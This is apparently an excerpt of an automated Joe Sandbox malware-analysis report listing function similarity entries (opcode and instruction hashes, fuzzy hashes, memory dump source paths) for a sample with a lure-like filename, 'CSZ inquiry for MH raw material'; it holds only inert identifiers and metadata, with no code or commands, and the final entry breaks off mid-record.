                                                                        • Opcode ID: fc23783f98bb516e2de4face521d7bb007981560034c5598e7a319008ebe3f7a
                                                                        • Instruction ID: a6f86717353730b379ed75515626e50f722b0f5f380309c2be5935c22ef5fec4
                                                                        • Opcode Fuzzy Hash: fc23783f98bb516e2de4face521d7bb007981560034c5598e7a319008ebe3f7a
                                                                        • Instruction Fuzzy Hash: F85186B12483458FC340DF29E881A6BB7E5BFC8348F44492DF489E7390EB30D9058B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction ID: 0786aea1e41f490a78457d05b24fd18a4929b3aa53e466cffa01c244be153396
                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction Fuzzy Hash: 12517871E0025AABCF15EF95C841BEEBBB9AF49754F04806AE901AB240D734DE44CBF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0a1831ca46897e72c4584981a852fe83d32206ffbb356b81d57b45f2e722c9d0
                                                                        • Instruction ID: 11a03099a7d93becdd675e05f6e5ea5b53b3f62dde46e2743fc638a33a37c973
                                                                        • Opcode Fuzzy Hash: 0a1831ca46897e72c4584981a852fe83d32206ffbb356b81d57b45f2e722c9d0
                                                                        • Instruction Fuzzy Hash: 7D518C32E4051D4BEF24CA68E462BEFB3E2EB81314F451826E915BB3C1C6A66E47D650
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b70ef6cfd29affb23d4af234ab5a2d6892b5248c99e649b92aae97b442cafb0a
                                                                        • Instruction ID: 65fc212ce9c6d41b5154ee36a4e72286918e6d189c97394f971a08d132c1c599
                                                                        • Opcode Fuzzy Hash: b70ef6cfd29affb23d4af234ab5a2d6892b5248c99e649b92aae97b442cafb0a
                                                                        • Instruction Fuzzy Hash: 4351D074A04216ABCB14DF59D884BBEBBB4FF84704F154169E941EB780E7B4ED50CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                        • Instruction ID: 9bbf0c0ecbd4d7faf417d338c095599ca2597f53f47e771f9f7abe743426bc53
                                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                        • Instruction Fuzzy Hash: 3351BF31D00219EFDF309B90D885BAEB7B9FB00368F255669E912B7390D7309E409BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b81b9374129fe58a592ed658749708482c67db2f08b0efde9c6f5b428c207914
                                                                        • Instruction ID: 82e137213bd1e71377f5abcc48e0be737953bed97002062a8809a674453b8523
                                                                        • Opcode Fuzzy Hash: b81b9374129fe58a592ed658749708482c67db2f08b0efde9c6f5b428c207914
                                                                        • Instruction Fuzzy Hash: CF512471A0411A9BCB15AF68D844A6EBBF5FF48344F244129E94DF7291EB30ED05DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9a830447dc006b261780efc4712bae01592bc019e9f77570f50c8178450d674
                                                                        • Instruction ID: eaa3119ae1c0d8660348324016db7ab9d0504ffe8ca08fa5fcfc7816b549cf6b
                                                                        • Opcode Fuzzy Hash: d9a830447dc006b261780efc4712bae01592bc019e9f77570f50c8178450d674
                                                                        • Instruction Fuzzy Hash: 4E519E72D01215DFCB60DFA9E8809AFBBB9FF48358B215629E509B3310D734AD41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                        • Instruction ID: 92de20f687dc7851b810a6c03b72ecfc0b5bd0f6d6c6bd309922bf3e56fc90a2
                                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                        • Instruction Fuzzy Hash: 5341E4316057059FD728EF24C980A6AB3E9FF80314B08567FE91EAB640EB30ED04C791
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 376805529da623759804735b14440bfb4f73ad6630393e80a39b160e8cac48aa
                                                                        • Instruction ID: 8213a68978ae4f62c40a4fccfe5f8d670884cac3315335f4bd5280c1df6580d2
                                                                        • Opcode Fuzzy Hash: 376805529da623759804735b14440bfb4f73ad6630393e80a39b160e8cac48aa
                                                                        • Instruction Fuzzy Hash: 34419A35A002199BCB14DF98C440AFEBBB4EF48714F2A816AEA15F7252D7359D41CBB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction ID: f7b635e8e71bd2c4489c4f28571e09036642d7debdf28c5edd6c78bdbc259172
                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction Fuzzy Hash: A0515B75A00215CFCB14CF98C484AAEFBF2FF84714F2881A9D865A7350D774AE82CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 33ce84677a3f3b93538f88b531e27a51296670e203ecb817207cbd03bfb9bf45
                                                                        • Instruction ID: 87ef8d1764ced27f40cac1f22debf617d13c7918e897678f32be0a00f1778a4d
                                                                        • Opcode Fuzzy Hash: 33ce84677a3f3b93538f88b531e27a51296670e203ecb817207cbd03bfb9bf45
                                                                        • Instruction Fuzzy Hash: 7951C1709002169FDB298B64DC41BE9B7B1EF51318F1882A9E469A72D2D738DD81CFA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction ID: 6832b2b58b30be49481fcfd7234b4f6f1609934f139751ff069fe643f32d8617
                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction Fuzzy Hash: A441A475B00105ABDB15EB99CE95AAFB7BAAF84744F645069EC0CF7342DA70DD008760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d8986e54aee493c5c17ec01012c49d236371ddd04c339922c17b79cc658ac3c
                                                                        • Instruction ID: 0028340c9b1f413d23ad1f5dacffc178b97b4bf05088ee85ec0f5408840aec78
                                                                        • Opcode Fuzzy Hash: 9d8986e54aee493c5c17ec01012c49d236371ddd04c339922c17b79cc658ac3c
                                                                        • Instruction Fuzzy Hash: 8141C2712043418FC708DF25D86597ABBE1FBC4729F054A6EF8999B392C735E809CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 125c0bf2ba66d9cebe386df8dac22bf43c665c3ba4c0b51249c5c8cfb4876307
                                                                        • Instruction ID: a0071497b8042b1c4da5b419b6659f0f7f17bef641511ad1717294a4df6a844d
                                                                        • Opcode Fuzzy Hash: 125c0bf2ba66d9cebe386df8dac22bf43c665c3ba4c0b51249c5c8cfb4876307
                                                                        • Instruction Fuzzy Hash: D74192B1600702DFD725DF24C880F26BBE9FF49304B288A6EE54687651EB30E845CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f307e6a724c922ac3f7ba56f086a7c7fbb19a1ae6f8176f2e2c3a271f8a5b8f
                                                                        • Instruction ID: 31ff9dd321834495221f4c3aa5917f60cd933796b2520d33f5d4033476ad42d8
                                                                        • Opcode Fuzzy Hash: 1f307e6a724c922ac3f7ba56f086a7c7fbb19a1ae6f8176f2e2c3a271f8a5b8f
                                                                        • Instruction Fuzzy Hash: 5F413030E082959FCB14CF28D881ABEFBF1FF58348F459499E0C59B246C334A856DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f99b9dce032aaebb4eb0642d883549550e86edebe1dbab7a4d165f5fe0eeefba
                                                                        • Instruction ID: 971057f0eebce3500c5309c2fd1f58397b32190ec576d47bfe819a43f6609d85
                                                                        • Opcode Fuzzy Hash: f99b9dce032aaebb4eb0642d883549550e86edebe1dbab7a4d165f5fe0eeefba
                                                                        • Instruction Fuzzy Hash: 1E41F371A00212DFCB14DF49DA80FAAB7B1FB84714F24912EE401AB292CB75D941DBB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1152a133aae7e9a5c1f78a1791e9a35316f92f74efcae0f802d45bc3899f7979
                                                                        • Instruction ID: 6386bfd43ab5460edcf0438d966f09660c94e4aed4551a193e5ea55a056cb332
                                                                        • Opcode Fuzzy Hash: 1152a133aae7e9a5c1f78a1791e9a35316f92f74efcae0f802d45bc3899f7979
                                                                        • Instruction Fuzzy Hash: 3A417C31508756DED711DF65C841AABB7E8EF84B54F40092BF981E7250EB30DE449BA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction ID: e1ca54439385f8c7eaabc597aae1df8e67158449d9b0b5b6b4508c4597e40849
                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction Fuzzy Hash: 69412B31B00211DBDB20EE5D8C407FAB761EB54759F26806AF846AB284DB31CDC1DBB2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 643eb66e8e68de17dfdeac391ab173c36792cb8e937194f6315c0a9288cfe0bf
                                                                        • Instruction ID: 09b6ab29c0c205db90161a77d49f2d0ac96a56cac1628b78d69a4b351654e027
                                                                        • Opcode Fuzzy Hash: 643eb66e8e68de17dfdeac391ab173c36792cb8e937194f6315c0a9288cfe0bf
                                                                        • Instruction Fuzzy Hash: 87415771600702EFD721DF18D841B66BBE4FF58714F24856EE849CB252E771E942CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction ID: 87dc7c483acb080da217beca975be8795e020b23606bb547e8eec77e7ea6bfd6
                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction Fuzzy Hash: 28411C75A00609EFCB24DF98C980AAABBF5FF18700B21856DE656D7652D330EA44CF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4393c9e5bcba554a097cb1c46e3bf3899abec54e1906bf1f760728cdd006f1b2
                                                                        • Instruction ID: a0ffc419d82401ea657699d8b7ef7c610187159f8f65796b1525677ebf97b5e8
                                                                        • Opcode Fuzzy Hash: 4393c9e5bcba554a097cb1c46e3bf3899abec54e1906bf1f760728cdd006f1b2
                                                                        • Instruction Fuzzy Hash: A6418E71501705CFCB25EF64C941BA9B7B1FF54310F2482AED446AB2A1DB309981DF71
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 39225a9e100ace8f3b003fdf43bfa274d6ab527233af118acbd235076579f354
                                                                        • Instruction ID: 8e4484c10737db7c06d0b6127b6a9b9ef224ff9787f69ee868779d0ca03089ab
                                                                        • Opcode Fuzzy Hash: 39225a9e100ace8f3b003fdf43bfa274d6ab527233af118acbd235076579f354
                                                                        • Instruction Fuzzy Hash: E7319AB2A10349DFDB11CF58C1407A9BBF0FB08714F2185AAE119EB291D7729A02CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3be47923ce0d3c7952043b0ce2937f97aea23d1c49c789ac60f668806c7f8c25
                                                                        • Instruction ID: 4418fe18c3374af76ede57675a695e86be9cc45d6d8a8ac1837bf47e376c9c62
                                                                        • Opcode Fuzzy Hash: 3be47923ce0d3c7952043b0ce2937f97aea23d1c49c789ac60f668806c7f8c25
                                                                        • Instruction Fuzzy Hash: 64419373A0402A8FCB18DF68D49157AB3F1FF8830475A42BDD909BB291DB34AD45CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9797d14e17426d00f6d757f1a189e36e97274c22dc8835ca62a2191c116da2e
                                                                        • Instruction ID: 976e78b62dc37ab244da8a81f40581eeaa3fd543a8aa52711bf6ff7605e35e1b
                                                                        • Opcode Fuzzy Hash: e9797d14e17426d00f6d757f1a189e36e97274c22dc8835ca62a2191c116da2e
                                                                        • Instruction Fuzzy Hash: 0141C371A06715DFCB00DF58C941AE8B7B9FF447A0F248229E816A7280DB30DD42EBB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5018e0eafe259be8a9dbbd1c1919f5758d49c0e587fd08a451e0db6e8ef2ffe9
                                                                        • Instruction ID: 5cd5fd53160f2303ecf2f0adfc81adc4f9461a8466ff5ae58e33bbec3c059e54
                                                                        • Opcode Fuzzy Hash: 5018e0eafe259be8a9dbbd1c1919f5758d49c0e587fd08a451e0db6e8ef2ffe9
                                                                        • Instruction Fuzzy Hash: 0941D4726046419FC320DF68D840B6AB3E9FFC8704F050A6DF955A7681E734ED14C7A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26ef5ffd37e51dc384a2c5c995d2386079e32edbd1eb1062df776faedaaa7d3e
                                                                        • Instruction ID: 3d02f7edc44d40a9fcbf71f142f5f2e0a9c6cc43330d8c2c10cb63fd04540f4f
                                                                        • Opcode Fuzzy Hash: 26ef5ffd37e51dc384a2c5c995d2386079e32edbd1eb1062df776faedaaa7d3e
                                                                        • Instruction Fuzzy Hash: CC41A0306043128BC725DF28D8A4F2BB7E9EF94364F18452EE9859B2A1DB30DD45CBB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65947faefd53ce6122ea557762e098807dfd1637f1a9591065c8d8b918e573a9
                                                                        • Instruction ID: 4f448e9e1aade9b5bfbd44e477e05531ed98866f3e26e6f8af4b8b1e8ca4a549
                                                                        • Opcode Fuzzy Hash: 65947faefd53ce6122ea557762e098807dfd1637f1a9591065c8d8b918e573a9
                                                                        • Instruction Fuzzy Hash: BC418EB1E01604CFCB14DF69C9809EDBBF5FF88724B24862EE467A7290DB349941DB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction ID: e5cb5139f41b757c2f4003368124d645cd2e4e5a7dc186f4b85f358e428d1f86
                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction Fuzzy Hash: ED311671A05244AFDB229B68CC44B9ABFE9EF84350F0441AAF855E7392C674D984CBB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4fa892d609a36449d6152434e197f85117353ac74e986fbdf45fc623ca3ff1e4
                                                                        • Instruction ID: fe2d2a0e4db4f2d962fd4c3759484b5b0b13412d0007d45b2964c2926a6acd6f
                                                                        • Opcode Fuzzy Hash: 4fa892d609a36449d6152434e197f85117353ac74e986fbdf45fc623ca3ff1e4
                                                                        • Instruction Fuzzy Hash: AC31C675790755ABD722AF659C81FAB76A9EB48B90F100028F600BB3D1CEA4DD00D7B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d1568a6605a351cc8e60edaa64699e502549d4f46d5123e0357da91b651edd9
                                                                        • Instruction ID: c16f442148c98ef206a45ec435725fd8fe2d64b938387d6f705cab4901100402
                                                                        • Opcode Fuzzy Hash: 4d1568a6605a351cc8e60edaa64699e502549d4f46d5123e0357da91b651edd9
                                                                        • Instruction Fuzzy Hash: B331B2B22052008FC721DF19DC81E66B7E5FB84354F0A956EE899AB3A1D730EC04CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5921e0b18664b02ec7bb980f8f4166f844782a332f1b6f8c16242d2d8d9a3ffe
                                                                        • Instruction ID: 7560e69ae065d92bd1b375e178793019d5bf57dde47965137512ea1a4af37663
                                                                        • Opcode Fuzzy Hash: 5921e0b18664b02ec7bb980f8f4166f844782a332f1b6f8c16242d2d8d9a3ffe
                                                                        • Instruction Fuzzy Hash: 4C41AE72100B56DFC722CF68D895FD677E9FB44314F14842EE59A9B2A2C774E844CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44b0505240ce3185495fa27c39684bb3aba8571552da94f8890fbbb665a432d2
                                                                        • Instruction ID: f9ad29b296789b1b364cca068ac538fbcb1da02fb81ea021eb28094d1abd4abb
                                                                        • Opcode Fuzzy Hash: 44b0505240ce3185495fa27c39684bb3aba8571552da94f8890fbbb665a432d2
                                                                        • Instruction Fuzzy Hash: A03190B22053018FD721DF29D881E6AB3E5FB84714F16956DF859AB391D730EC04CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e9b33cecddd01a805e17cdb698110ef76c81524e40fc022ab895f682a01192f
                                                                        • Instruction ID: a2c1efc7c7baabfbe223afe1182bf785eb0e63607debfef72be03f97760cac70
                                                                        • Opcode Fuzzy Hash: 4e9b33cecddd01a805e17cdb698110ef76c81524e40fc022ab895f682a01192f
                                                                        • Instruction Fuzzy Hash: 5831AF312016C59BE3375769894DF69BBD9EF40B48F1920A0AA45AB7D2DB28DC41C621
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee6fad8f247dea60b53b53bd209f8ffa3fa993c83737ac455ea20a8faba77282
                                                                        • Instruction ID: b55ac59a907f7a4102faa31b6821b4da0996023087088b4a0ad1b240749eaf96
                                                                        • Opcode Fuzzy Hash: ee6fad8f247dea60b53b53bd209f8ffa3fa993c83737ac455ea20a8faba77282
                                                                        • Instruction Fuzzy Hash: 0531D075A00219EBDB15EF98CD41FAEB3B5EB48B44F4541A9F908BB294D770AD40CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ceef46c79bc524e257678e60481feaf7af56958323c3ca39ee852204497745c4
